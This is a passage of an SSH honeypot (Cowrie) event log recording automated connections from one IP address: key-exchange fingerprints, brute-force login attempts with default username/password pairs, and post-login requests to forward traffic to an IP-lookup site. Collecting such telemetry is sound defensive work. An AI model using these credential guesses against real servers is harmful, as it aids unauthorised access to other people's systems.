ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:45.391316Z","src_ip":"212.227.235.229","session":"02bed677e315"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:46.675467Z","src_ip":"212.227.235.229","session":"748ed547b7bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35520,"dst_ip":"1.2.3.4","dst_port":22,"session":"09523c8962b9","protocol":"ssh","message":"New connection: 212.227.235.229:35520 (1.2.3.4:22) [session: 09523c8962b9]","sensor":"my-vps","timestamp":"2025-08-28T08:05:47.758916Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:47.764549Z","src_ip":"212.227.235.229","session":"748ed547b7bd"}
{"eventid":"cowrie.login.failed","username":"joggler","password":"joggler","message":"login attempt [joggler/joggler] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:47.888824Z","src_ip":"212.227.235.229","session":"02bed677e315"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:48.034368Z","src_ip":"212.227.235.229","session":"09523c8962b9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:48.079005Z","src_ip":"212.227.235.229","session":"09523c8962b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51464,"dst_ip":"1.2.3.4","dst_port":22,"session":"c60d46ada142","protocol":"ssh","message":"New connection: 212.227.235.229:51464 (1.2.3.4:22) [session: c60d46ada142]","sensor":"my-vps","timestamp":"2025-08-28T08:05:48.914888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:48.916253Z","src_ip":"212.227.235.229","session":"c60d46ada142"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:49.037060Z","src_ip":"212.227.235.229","session":"748ed547b7bd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:50.190126Z","src_ip":"212.227.235.229","session":"c60d46ada142"}
{"eventid":"cowrie.login.success","username":"root","password":"nimda","message":"login attempt [root/nimda] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:05:51.718167Z","src_ip":"212.227.235.229","session":"c60d46ada142"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:05:51.988897Z","session":"c60d46ada142"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:53.595919Z","src_ip":"212.227.235.229","session":"02bed677e315"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:05:54.629621Z","src_ip":"212.227.235.229","session":"c60d46ada142"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:56.076751Z","src_ip":"212.227.235.229","session":"c60d46ada142"}
{"eventid":"cowrie.login.success","username":"root","password":"htpcguides","message":"login attempt [root/htpcguides] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:05:57.079590Z","src_ip":"212.227.235.229","session":"09523c8962b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:05:57.354211Z","session":"09523c8962b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:05:57.649630Z","src_ip":"212.227.235.229","session":"09523c8962b9"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:57.934054Z","src_ip":"212.227.235.229","session":"09523c8962b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35286,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c9a2bd71fc","protocol":"ssh","message":"New connection: 212.227.235.229:35286 (1.2.3.4:22) [session: 31c9a2bd71fc]","sensor":"my-vps","timestamp":"2025-08-28T08:06:06.155890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:06.158345Z","src_ip":"212.227.235.229","session":"31c9a2bd71fc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:07.289672Z","src_ip":"212.227.235.229","session":"31c9a2bd71fc"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:10.200239Z","src_ip":"212.227.235.229","session":"31c9a2bd71fc"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:12.185431Z","src_ip":"212.227.235.229","session":"31c9a2bd71fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45608,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7e2d2e97c38","protocol":"ssh","message":"New connection: 212.227.235.229:45608 (1.2.3.4:22) [session: e7e2d2e97c38]","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.120585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.175127Z","src_ip":"212.227.235.229","session":"e7e2d2e97c38"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.507650Z","src_ip":"212.227.235.229","session":"e7e2d2e97c38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45616,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f9f7fe3b02c","protocol":"ssh","message":"New connection: 212.227.235.229:45616 (1.2.3.4:22) [session: 1f9f7fe3b02c]","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.682368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.690460Z","src_ip":"212.227.235.229","session":"1f9f7fe3b02c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34936,"dst_ip":"1.2.3.4","dst_port":22,"session":"dafda33c5011","protocol":"ssh","message":"New connection: 212.227.235.229:34936 (1.2.3.4:22) [session: dafda33c5011]","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.894054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:15.909625Z","src_ip":"212.227.235.229","session":"dafda33c5011"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","